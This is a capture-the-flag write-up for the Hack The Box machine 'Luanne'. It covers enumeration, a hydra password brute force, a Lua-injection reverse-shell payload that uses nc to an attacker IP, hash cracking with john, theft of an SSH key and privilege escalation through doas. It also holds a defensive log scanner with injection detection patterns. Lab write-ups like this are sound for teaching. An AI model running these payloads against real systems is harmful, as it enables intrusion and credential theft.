Welcome to the Luanne writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Luanne
tags: HTB, Easy, Linux
Platform: Hackthebox
Difficulty: Easy
OS: Linux
Enumeration
Nmap
kali@kali:$ sudo nmap -sS -p- -T5 -n --open 10.129.45.136 -oN AllPorts.txt
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-30 16:05 EST
Nmap scan report for 10.129.45.136
Host is up (0.044s latency).
Not shown: 62334 filtered ports, 3198 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9001/tcp open tor-orport
Nmap done: 1 IP address (1 host up) scanned in 32.08 seconds
kali@kali:$ sudo nmap -sC -sV -p22,80,9001 -n -T5 10.129.45.136 -oN PortsInDepth.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
Port 9001
Port 80
It also requires a password.
However, it lets you access the robots.txt file: http://10.129.45.136/robots.txt
User-agent: *
Disallow: /weather #returning 404 but still harvesting cities
Using dirbuster, the following directories appear:
kali@kali:$ gobuster dir -t 20 -u http://10.129.45.136/weather/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.129.45.136/weather/
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/11/30 18:02:37 Starting gobuster
===============================================================
/forecast (Status: 200)
===============================================================
2020/11/30 18:22:58 Finished
===============================================================
Sending random characters produces the following error.
http://10.129.45.136/weather/forecast?city=list
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ hydra -I -l user -P /usr/share/wordlists/rockyou.txt -s 9001 -f 10.129.45.136 http-get /
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-30 19:00:50
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.129.45.136:9001/
[9001][http-get] host: 10.129.45.136 login: user password: 123
[STATUS] attack finished for 10.129.45.136 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-30 19:01:35
Exploit
Change the IP and port.
http://luanne.htb/weather/forecast?city=London%27%29%3Bos.execute%28%22rm%20%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.XX.XX%20PUERTO%20%3E%2Ftmp%2Ff%22%29--
$ ls -la
total 20
drwxr-xr-x 2 root wheel 512 Nov 25 11:27 .
drwxr-xr-x 24 root wheel 512 Nov 24 09:55 ..
-rw-r--r-- 1 root wheel 47 Sep 16 15:07 .htpasswd
-rw-r--r-- 1 root wheel 386 Sep 17 20:56 index.html
-rw-r--r-- 1 root wheel 78 Nov 25 11:38 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
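The payload above works because the `city` value is spliced into Lua source and evaluated: the `')` closes the quoted argument, `;os.execute(...)` runs a shell command, and the trailing `--` comments out whatever followed. From the defender's side, every such request arrives percent-encoded in the query string, so a front-end access log (the nginx on port 80 here, combined log format assumed) records it. The following is an added example, not code from the box or this writeup's author: it decodes the `city` parameter from constructed sample log lines, flags Lua-injection indicators, and applies the positive allow-list a weather endpoint should have enforced in the first place. The log lines, the `VALID_CITY` pattern and the indicator names are all assumptions for the demo.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed nginx "combined"-style access-log lines for the demo (not real traffic).
SAMPLE_LOG = """\
10.10.14.2 - - [30/Nov/2020:19:05:01 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 512 "-" "curl/7.74.0"
10.10.14.2 - - [30/Nov/2020:19:05:07 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 301 "-" "curl/7.74.0"
10.10.14.2 - - [30/Nov/2020:19:06:22 +0000] "GET /weather/forecast?city=London%27%29%3Bos.execute%28%22id%22%29-- HTTP/1.1" 500 0 "-" "curl/7.74.0"
10.10.14.2 - - [30/Nov/2020:19:06:40 +0000] "GET /robots.txt HTTP/1.1" 200 78 "-" "curl/7.74.0"
"""

# Pulls the request line out of a combined-format log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators that a value is trying to break out of a quoted Lua string and run code.
LUA_INDICATORS = {
    "os.execute": re.compile(r"os\s*\.\s*execute", re.I),
    "io.popen": re.compile(r"io\s*\.\s*popen", re.I),
    "load/dofile": re.compile(r"\b(?:load|loadstring|dofile)\s*\(", re.I),
    "string-break": re.compile(r"""['"]\s*\)\s*;"""),  # closes the quoted argument, starts a new statement
    "comment-tail": re.compile(r"--\s*$"),              # Lua line comment that swallows the rest of the code
}

# Allow-list a well-formed weather endpoint would enforce (assumption, not the box's rule).
VALID_CITY = re.compile(r"^[A-Za-z][A-Za-z .-]{0,63}$")


def is_valid_city(value: str) -> bool:
    """Positive validation: letters, spaces, dots and hyphens only, 64 chars max."""
    return VALID_CITY.match(value) is not None


def lua_injection_indicators(value: str) -> list[str]:
    """Return the names of every injection indicator that fires on an already-decoded value."""
    return [name for name, rx in LUA_INDICATORS.items() if rx.search(value)]


def city_params(line: str) -> list[str]:
    """Extract the decoded city= values from one access-log line (empty list if none)."""
    m = REQUEST_LINE.search(line)
    if not m:
        return []
    query = urlparse(m.group("target")).query
    # parse_qs splits on the raw '&' first, then percent-decodes each value,
    # so an encoded ';' (%3B) inside the payload cannot split the parameter.
    return parse_qs(query).get("city", [])


def scan_log(text: str) -> list[dict]:
    """Flag log lines whose city parameter fails validation or matches an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for value in city_params(line):
            hits = lua_injection_indicators(value)
            if hits or not is_valid_city(value):
                findings.append({"line": lineno, "city": value, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: city={f['city']!r} indicators={f['indicators']}")
```

The allow-list check is the one that matters for the application itself: the indicator patterns are useful for hunting through old logs, but a handler that only accepts a city name matching `VALID_CITY` (or better, a lookup against its own city table) never builds Lua code from user input at all. Note that the `list` keyword the box accepts passes the allow-list, so the check does not break the documented behaviour.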
Using hashid I get the following type
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ hashid htpasswd
--File 'htpasswd'--
Analyzing '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0'
[+] MD5 Crypt
[+] Cisco-IOS(MD5)
[+] FreeBSD MD5
Using john, it cracks it in no time
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ john htpasswd -w=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iamthebest (?)
1g 0:00:00:00 DONE (2020-12-01 16:11) 9.090g/s 27490p/s 27490c/s 27490C/s secrets..iamcool
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The resulting credential is
webapi_user:iamthebest
There is only one user.
total 1.5K
drwxr-xr-x 3 root wheel 512B Sep 14 06:46 .
drwxr-xr-x 21 root wheel 512B Sep 16 22:05 ..
dr-xr-x--- 7 r.michaels users 512B Sep 16 18:20 r.michaels
On the page http://luanne.htb:9001/logtail/processes
The username and password are:
user:123
We find the processes that are running:
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
root 0 0.0 0.1 0 6136 ? DKl 9:29PM 0:02.54 [system]
root 1 0.0 0.0 19852 1520 ? Ss 9:29PM 0:01.51 init
root 163 0.0 0.0 32508 2324 ? Ss 9:29PM 0:34.35 /usr/sbin/syslogd -s
r.michaels 185 0.0 0.0 34992 1976 ? Is 9:30PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www
root 298 0.0 0.0 20140 1332 ? Is 9:29PM 0:00.00 /usr/sbin/powerd
root 299 0.0 0.0 33424 1836 ? Is 9:30PM 0:00.00 nginx: master process /usr/pkg/sbin/nginx
_httpd 336 0.0 0.3 119324 17232 ? Ss 9:30PM 0:02.24 /usr/pkg/bin/python3.8 /usr/pkg/bin/supervisord-3.8
root 348 0.0 0.0 71348 2972 ? Ss 9:30PM 0:25.50 /usr/sbin/sshd
nginx 373 0.0 0.1 33932 3364 ? I 9:30PM 0:07.82 nginx: worker process
_httpd 376 0.0 0.0 34952 2012 ? Is 9:30PM 0:01.90 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www
root 402 0.0 0.0 20216 1656 ? Ss 9:30PM 0:00.02 /usr/sbin/cron
_httpd 12176 0.0 0.0 17596 1128 ? O 11:01PM 0:00.00 /usr/bin/egrep ^USER| \\[system\\] *$| init *$| /usr/sbin/sshd *$| /usr/sbin/syslogd -s *$| /usr/pkg/bin/python3.8 /usr/pkg/bin/supervisord-3.8 *$| /usr/sbin/cron *$| /usr/sbin/powerd *$| /usr/libexec/httpd -u -X -s.*$|^root.* login *$| /usr/libexec/getty Pc ttyE.*$| nginx.*process.*$
_httpd 29239 0.0 0.0 35252 2320 ? I 10:12PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www
_httpd 29841 0.0 0.0 35252 2320 ? I 10:55PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www
root 421 0.0 0.0 21652 1580 ttyE1 Is+ 9:30PM 0:00.00 /usr/libexec/getty Pc ttyE1
root 388 0.0 0.0 19780 1584 ttyE2 Is+ 9:30PM 0:00.00 /usr/libexec/getty Pc ttyE2
root 433 0.0 0.0 19780 1580 ttyE3 Is+ 9:30PM 0:00.00 /usr/libexec/getty Pc ttyE3
Among them we find another web process running as r.michaels.
r.michaels 185 0.0 0.0 34992 1976 ? Is 9:30PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www
Here is the page it refers to: https://man.netbsd.org/httpd.8
The -u parameter: "Causes bozohttpd to switch to the user and the groups of username after. This option, like -t above, causes bozohttpd to clear the environment unless the -e option is given." So we will have access to r.michaels' folder.
curl -i -u webapi_user:iamthebest http://localhost:3001/~r.michaels/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 601 0 601 0 0 293k 0 --:--:-- --:--:-- --:--:-- 293k
HTTP/1.1 200 OK
Date: Fri, 04 Dec 2020 15:27:19 GMT
Server: bozohttpd/20190228
Accept-Ranges: bytes
Content-Type: text/html
Connection: close
<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
border-top: 1px solid black;
border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>
There is an id_rsa key in the directory (r.michaels' key).
curl -i -u webapi_user:iamthebest http://localhost:3001/~r.michaels/id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2610 100 2610 0 0 849k 0 --:--:-- --:--:-- --:--:-- 849k
HTTP/1.1 200 OK
Date: Fri, 04 Dec 2020 15:27:39 GMT
Server: bozohttpd/20190228
Accept-Ranges: bytes
Last-Modified: Wed, 16 Sep 2020 16:52:06 GMT
Content-Type: text/plain
Content-Length: 2610
Connection: close
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
Privilege Escalation
Inside the user's home directory we find another directory called backups, and inside it devel_backup-2020-09-16.tar.gz.enc,
which is encrypted with pgp. Listing the binaries available on the system, I find /usr/bin/netpgp, which we can use to decrypt the file as follows.
$ netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/devel_backup-2020-09-16.tar.gz
Inside the folder there is another .htpasswd file with a different password.
# john -w=/usr/share/wordlists/rockyou.txt .htpasswd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littlebear (webapi_user)
1g 0:00:00:00 DONE (2020-12-04 16:53) 4.166g/s 54400p/s 54400c/s 54400C/s gamboa..hello11
Use the "--show" option to display all of the cracked passwords reliably
Session completed
As far as I can see, we can't use su or sudo since this is NetBSD.
luanne$ su toor
su: You are not listed in the correct secondary group (wheel) to su toor.
su: Sorry: Authentication error
I'll list the SUID binaries.
luanne$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/at
/usr/bin/atq
/usr/bin/atrm
/usr/bin/batch
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/lock
/usr/bin/login
/usr/bin/lpq
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/rlogin
/usr/bin/skeyinfo
/usr/bin/skeyinit
/usr/bin/su
/usr/bin/yppasswd
/usr/libexec/mail.local
/usr/libexec/ssh-keysign
/usr/libexec/utmp_update
/usr/sbin/authpf
/usr/sbin/mrinfo
/usr/sbin/mtrace
/usr/sbin/pppd
/usr/sbin/sliplogin
/usr/sbin/traceroute
/usr/sbin/traceroute6
/usr/pkg/bin/doas
/usr/pkg/libexec/dbus-daemon-launch-helper
/bin/rcmd
/sbin/ping
/sbin/ping6
/sbin/shutdown
I think we can use /usr/pkg/bin/doas for that, since it has the same functionality as su.
luanne$ doas -u toor /bin/sh
Password:
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
#
And now we are root.